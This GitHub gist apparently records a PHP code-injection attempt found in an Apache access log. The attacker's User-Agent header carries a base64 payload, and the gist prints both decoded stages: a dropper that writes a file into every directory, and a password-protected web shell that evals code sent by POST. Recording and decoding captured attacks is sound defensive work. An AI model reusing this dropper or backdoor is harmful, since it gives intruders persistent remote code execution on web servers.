Skip to content

Instantly share code, notes, and snippets.

@fthomas

fthomas/gist:5049911

Last active December 14, 2015 07:19
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save fthomas/5049911 to your computer and use it in GitHub Desktop.
Save fthomas/5049911 to your computer and use it in GitHub Desktop.
Download ZIP
<?php eval(base64_decode User-Agent...
Raw
gistfile1.txt
from /var/log/apache2/access.log:
46.105.114.130 - - [27/Feb/2013:18:27:52 +0100] "GET / HTTP/1.1" 200 772 "" "<?php eval(base64_decode(\"YWRkTG9hZGVyKCk7DQokZGF0YSA9IEBvcGVuZGlyKCcuJyk7DQoNCndoaWxlICgkZmlsZSA9IEByZWFkZGlyKCRkYXRhKSkNCnsNCgkkZmlsZSA9IHRyaW0oJGZpbGUpOw0KCWlmICghJGZpbGUgfHwgcHJlZ19tYXRjaCgnL15cLiskLycsICRmaWxlKSB8fCAhaXNfZGlyKCRmaWxlKSkgY29udGludWU7DQoJYWRkTG9hZGVyKCRmaWxlKTsNCn0NCg0KQGNsb3NlZGlyKCRkYXRhKTsNCg0KZnVuY3Rpb24gYWRkTG9hZGVyKCRkaXIgPSAnJykNCnsNCiAgICBpZiAoJGRpcikgJGRpciAuPSAnLyc7DQogICAgQGNobW9kKCRkaXIsIDc3Nyk7DQogICAgDQogICAgJGZwID0gZm9wZW4oInskZGlyfThkOTQ2YmY5NGY1YTU2MDY0NmNmNzdmYjYwOTg4MWQ0LnBocCIsICJ3Iik7IA0KICAgIGZ3cml0ZSgkZnAsIGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ2cwS1FHbHVhVjl6WlhRb0oyRnNiRzkzWDNWeWJGOW1iM0JsYmljc0lERXBPdzBLUUdsdWFWOXpaWFFvSjJSbFptRjFiSFJmYzI5amEyVjBYM1JwYldWdmRYUW5MQ0EyTUNrN0RRcEFhVzVwWDNObGRDZ25iV0Y0WDJWNFpXTjFkR2x2Ymw5MGFXMWxKeXdnTmpBcE93MEtRSE5sZEY5MGFXMWxYMnhwYldsMEtEWXdLVHNOQ2cwS0pHUmhkR0VnUFNCQWRXNXpaWEpwWVd4cGVtVW9ZbUZ6WlRZMFgyUmxZMjlrWlNoMGNtbHRLRUFrWDFCUFUxUmJKMlJoZEdFblhTa3BLVHNOQ2cwS2FXWWdLRUFoYVhOZllYSnlZWGtvSkdSaGRHRXBJSHg4SUcxa05TZ2taR0YwWVZzbmNHRnpjM2R2Y21RblhTa2dJVDBnSjJRelpHWTBNemxqTTJVMFlqSmpOREU1TWpCa09HVXlOek16TVRFek1qTTJKeWtnWlhocGREc05DbWxtSUNoQUpHUmhkR0ZiSjJOdlpHVW5YU2tnWlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSa1lYUmhXeWRqYjJSbEoxMHBLVHNOQ21sbUlDaEFKR1JoZEdGYkoyTm9aV05yWDJOdlpHVW5YU2tnY0hKcGJuUWdKR1JoZEdGYkoyTm9aV05yWDJOdlpHVW5YVHNOQ2cwS1B6ND0nKSk7DQoJZmNsb3NlKCRmcCk7DQoNCglpZiAoZmlsZV9leGlzdHMoInskZGlyfThkOTQ2YmY5NGY1YTU2MDY0NmNmNzdmYjYwOTg4MWQ0LnBocCIpKQ0KCXsNCiAgICAgICAgJGNrID0gIjE4MjM2NDkzNjU4MjAzNTQiOw0KCSAgICBwcmludCAiJGNrOnsqfTokZGlyOnsqfToiOw0KCQlleGl0Ow0KCX0NCn0=\")); ?>"
base64_decoded =>
addLoader();\r\n$data = @opendir(\'.\');\r\n\r\nwhile ($file = @readdir($data))\r\n{\r\n\t$file = trim($file);\r\n\tif (!$file || preg_match(\'/^\\.+$/\', $file) || !is_dir($file)) continue;\r\n\taddLoader($file);\r\n}\r\n\r\n@closedir($data);\r\n\r\nfunction addLoader($dir = \'\')\r\n{\r\n if ($dir) $dir .= \'/\';\r\n @chmod($dir, 777);\r\n \r\n $fp = fopen("{$dir}8d946bf94f5a560646cf77fb609881d4.php", "w"); \r\n fwrite($fp, base64_decode(\'PD9waHANCg0KQGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KQGluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA2MCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgNjApOw0KQHNldF90aW1lX2xpbWl0KDYwKTsNCg0KJGRhdGEgPSBAdW5zZXJpYWxpemUoYmFzZTY0X2RlY29kZSh0cmltKEAkX1BPU1RbJ2RhdGEnXSkpKTsNCg0KaWYgKEAhaXNfYXJyYXkoJGRhdGEpIHx8IG1kNSgkZGF0YVsncGFzc3dvcmQnXSkgIT0gJ2QzZGY0MzljM2U0YjJjNDE5MjBkOGUyNzMzMTEzMjM2JykgZXhpdDsNCmlmIChAJGRhdGFbJ2NvZGUnXSkgZXZhbChiYXNlNjRfZGVjb2RlKCRkYXRhWydjb2RlJ10pKTsNCmlmIChAJGRhdGFbJ2NoZWNrX2NvZGUnXSkgcHJpbnQgJGRhdGFbJ2NoZWNrX2NvZGUnXTsNCg0KPz4=\'));\r\n\tfclose($fp);\r\n\r\n\tif (file_exists("{$dir}8d946bf94f5a560646cf77fb609881d4.php"))\r\n\t{\r\n $ck = "1823649365820354";\r\n\t print "$ck:{*}:$dir:{*}:";\r\n\t\texit;\r\n\t}\r\n}
base64_decoded =>
<?php\r\n\r\n@ini_set('allow_url_fopen', 1);\r\n@ini_set('default_socket_timeout', 60);\r\n@ini_set('max_execution_time', 60);\r\n@set_time_limit(60);\r\n\r\n$data = @unserialize(base64_decode(trim(@$_POST['data'])));\r\n\r\nif (@!is_array($data) || md5($data['password']) != 'd3df439c3e4b2c41920d8e2733113236') exit;\r\nif (@$data['code']) eval(base64_decode($data['code']));\r\nif (@$data['check_code']) print $data['check_code'];\r\n\r\n?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment